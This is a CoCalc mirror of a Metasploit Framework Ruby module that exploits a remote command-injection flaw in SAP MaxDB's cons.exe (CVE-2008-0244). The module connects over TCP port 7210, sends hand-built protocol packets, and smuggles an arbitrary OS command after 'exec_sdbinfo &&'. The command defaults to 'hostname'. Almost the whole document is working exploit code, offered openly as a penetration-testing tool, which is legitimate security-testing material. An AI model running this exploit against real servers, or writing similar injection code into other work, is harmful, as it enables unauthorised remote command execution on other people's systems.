Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'SAP MaxDB cons.exe Remote Command Injection',

14
        'Description' => %q{

15
          SAP MaxDB is prone to a remote command-injection vulnerability

16
          because the application fails to properly sanitize user-supplied input.

17
        },

18
        'Author' => [ 'MC' ],

19
        'License' => MSF_LICENSE,

20
        'References' => [

21
          ['OSVDB', '40210' ],

22
          ['BID', '27206'],

23
          ['CVE', '2008-0244'],

24
        ],

25
        'DisclosureDate' => '2008-01-09',

26
        'Notes' => {

27
          'Stability' => [CRASH_SAFE],

28
          'SideEffects' => [IOC_IN_LOGS],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33


34
    register_options(

35
      [

36
        Opt::RPORT(7210),

37
        OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),

38
      ]

39
    )

40
  end

41


42
  def run

43
    connect

44


45
    # Grab the MaxDB info.

46
    pdbmsrv = "\x5A\x00\x00\x00\x03\x5B\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF"

47
    pdbmsrv << "\x00\x00\x04\x00\x5A\x00\x00\x00\x00\x02\x42\x00\x04\x09\x00\x00"

48
    pdbmsrv << "\x00\x40\x00\x00\xD0\x3F\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"

49
    pdbmsrv << "\x00\x07\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00"

50
    pdbmsrv << "\x07\x49\x33\x34\x33\x32\x00\x04\x50\x1C\x2A\x03\x52\x01\x03\x72"

51
    pdbmsrv << "\x01\x09\x70\x64\x62\x6D\x73\x72\x76\x00"

52


53
    db_version = "\x28\x00\x00\x00\x03\x3f\x00\x00\x01\x00\x00\x00\xc0\x0b\x00\x00"

54
    db_version << "\x00\x00\x04\x00\x28\x00\x00\x00\x64\x62\x6d\x5f\x76\x65\x72\x73"

55
    db_version << "\x69\x6f\x6e\x20\x20\x20\x20\x20"

56


57
    sock.put(pdbmsrv)

58
    sock.get_once

59
    sock.put(db_version)

60


61
    ver = sock.get_once || ''

62


63
    info = ver[27, 2000]

64
    if !info.empty?

65
      print_status(info)

66
    end

67


68
    # Send our command.

69
    len = 39 + datastore['CMD'].length

70


71
    data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"

72
    data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64"

73
    data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + datastore['CMD'].to_s

74


75
    sock.put(data)

76


77
    res = sock.get_once

78
    print_line(res)

79


80
    disconnect

81
  end

82
end

83


84